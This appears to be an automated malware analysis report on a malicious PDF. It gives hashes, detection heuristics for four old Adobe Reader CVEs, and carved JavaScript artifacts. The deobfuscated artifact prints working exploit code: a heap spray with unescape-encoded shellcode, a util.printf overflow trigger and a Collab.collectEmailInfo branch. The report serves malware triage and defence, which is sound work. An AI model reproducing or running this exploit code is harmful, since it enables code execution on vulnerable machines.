Malicious PDF — malware analysis report

Static analysis result for SHA-256 86889d2464ebb24d…

MALICIOUS

PDF

15.7 KB
MD5: da9b5ebc0a0cdbcb4a3d432dabc9a313 SHA-1: 6d105384f8a92f194dbada220b037ccd1a9b354b SHA-256: 86889d2464ebb24d3187f47fae67f52b278f1094f59f7ae5ad0aae5a245938d8
676 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains obfuscated JavaScript that exploits multiple known Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The JavaScript is designed to download and execute a second-stage payload, as indicated by the ClamAV detection of 'Js.Exploit.Shellcode-18' on an extracted artifact. The primary function of the embedded script is to facilitate the execution of further malicious code.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 12

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Pdf.Exploit.Agent-36086 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36086
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Large comment-padded JavaScript eval stager high PDF_JS_LARGE_COMMENT_PADDED_EVAL
    PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and recovered stage inside noise, not normal PDF form automation.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js
97b25d00f38717efd02e3f4bc4b0364462feb80d03841e8de2391d599f772b9f		 pdf-javascript-stream PDF /JS object 6 at offset 0x143 425197 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 42 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function Ba(Xa){ /*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
... (truncated)
legacy_pdfkit_stage_000.js
c8ff04c53cd8c6c03c70245f36dbe82204bc0209339bb6e374a91cccceab3cc5		 deobfuscated-js comment-padded substitution-hex decoded JavaScript at offset 0x143 10413 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len)
{
	while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
	var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uDBFF%u261B%uBF0B%u16BA%uDB0B%uAD1B%uD74B%u5690%u7617%u5690%u5A03%u26DF%u24FC%uADE4%u60E7%u2653%uDB0B%u2671%u5563%u2855%uB3E7%uD883%uD581%uC973%u3BC5%u4E7B%u1138%u7D91%uE363%u8A39%uB3EC%u6FF1%u3381%uFD73%uF881%u4EF2%u9750%uFB01%u3763%u258C%u3307%u2704%uDB0B%u2292%u5820%u22F0%u1B00%uD76E%uB563%u527E%uB30B%u4F6C%uB265%uD94F%uF35E%u7F42%u1B00%uA214%uDBF3%u261B%u2B80%u7EA0%uDB0B%u4C1B%uB30B%u6232%u8CE3%u6F73%uD4E6%u4E65%u9080%u79F8%u3BE3%u261B%u520B%u0D1F%u3088%u2D1F%uAECB%uABEA%uDB8E%u2619%u8B0B%uD973%uDB0B%uD91B%uEF5E%uA396%uDF0B%u261B%uB15B%u4C1B%u560B%u269E%uDB09%u761B%u8EF4%uAB23%uDBBE%u261F%u770B%uE611%u207E%uE155%uF50D%u5E7E%u1C6E%u225D%uDB0B%u261B%u5E86%u221B%uDB0B%uEF28%u8B5A%u73E4%u9B37%uA214%uDB8B%u261B%u5243%u6A5E%uDB63%u265B%uB10B%uD95B%u935E%uE610%uB57F%u6392%uB16B%u4C1B%uB10B%u4C1B%uB10B%uD91B%u8B5E%uE610%u817F%u2671%uDB63%u261B%uB10F%u4C1B%u320B%u26B1%uDB0B%uD94B%u8F5E%uE610%u997F%u6392%u5663%u425E%uB35B%u661B%uDB0B%u53E4%u246B%u4E6E%u8EF4%u2D43%uAFCB%uAD0E%uBF4E%uE610%uD57F%u53E4%u246F%u466E%uAEF4%uD957%u9B5E%uF3F0%uAEF4%uD957%u9F5E%uEF30%u8A4A%uA396%uDF0B%u261B%u245B%u0A4E%u2461%u73E4%u8E3B%uCA90%uA680%u2D13%uAFF4%u7550%u0580%uAD4D%uE778%u5290%uA338%uD518%u505D%u066D%u2808%uEF28%u9A42%u25B6%u8DC8%uD028%u6504%u1E0B%uAFDD%uE713%uD6C5%uD418%u304B%u1DEA%u85F5%uC36E%u5051%uADF0%uFF51%uFB18%u506D%u6D17%u8180%u2507%u50D6%uAD1F%u1E08%u7D45%uD9E0%uE628%u1956%u261F%u8AE3%uD9E4%uB3F4%u526F%uE17B%u0934%uA86A%u4772%uAB65%u5474%uAF65%u4F69%uF57B%u4978%uF466%u546F%uBF6A%u097E%uB834%u1726%uA82D%u4272%uBE36%u4429%uEE3F%u117F%uE83C%u442B%uB93F%u1723%uED6E%u1779%uEF33%u457D%uEE3F%u422A%uBD6E%u162A%uFD3C%u1B68%uDB38%u261B%u000B");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;
	while(bigblock.length<spray){bigblock+=bigblock;}
	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);
	while(block.length+spray<0x40000){block=block+block+fillblock;}
	var mem_array=new Array();
	for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}
	
function collab_email()
{
	var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uDBFF%u261B%uBF0B%u16BA%uDB0B%uAD1B%uD74B%u5690%u7617%u5690%u5A03%u26DF%u24FC%uADE4%u60E7%u2653%uDB0B%u2671%u5563%u2855%uB3E7%uD883%uD581%uC973%u3BC5%u4E7B%u1138%u7D91%uE363%u8A39%uB3EC%u6FF1%u3381%uFD73%uF881%u4EF2%u9750%uFB01%u3763%u258C%u3307%u2704%uDB0B%u2292%u5820%u22F0%u1B00%uD76E%uB563%u527E%uB30B%u4F6C%uB265%uD94F%uF35E%u7F42%u1B00%uA214%uDBF3%u261B%u2B80%u7EA0%uDB0B%u4C1B%uB30B%u6232%u8CE3%u6F73%uD4E6%u4E65%u9080%u79F8%u3BE3%u261B%u520B%u0D1F%u3088%u2D1F%uAECB%uABEA%uDB8E%u2619%u8B0B%uD973%uDB0B%uD91B%uEF5E%uA396%uDF0B%u261B%uB15B%u4C1B%u560B%u269E%uDB09%u761B%u8EF4%uAB23%uDBBE%u261F%u770B%uE611%u207E%uE155%uF50D%u5E7E%u1C6E%u225D%uDB0B%u261B%u5E86%u221B%uDB0B%uEF28%u8B5A%u73E4%u9B37%uA214%uDB8B%u261B%u5243%u6A5E%uDB63%u265B%uB10B%uD95B%u935E%uE610%uB57F%u6392%uB16B%u4C1B%uB10B%u4C1B%uB10B%uD91B%u8B5E%uE610%u817F%u2671%uDB63%u261B%uB10F%u4C1B%u320B%u26B1%uDB0B%uD94B%u8F5E%uE610%u997F%u6392%u5663%u425E%uB35B%u661B%uDB0B%u53E4%u246B%u4E6E%u8EF4%u2D43%uAFCB%uAD0E%uBF4E%uE610%uD57F%u53E4%u246F%u466E%uAEF4%uD957%u9B5E%uF3F0%uAEF4%uD957%u9F5E%uEF30%u8A4A%uA396%uDF0B%u261B%u245B%u0A4E%u2461%u73E4%u8E3B%uCA90%uA680%u2D13%uAFF4
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.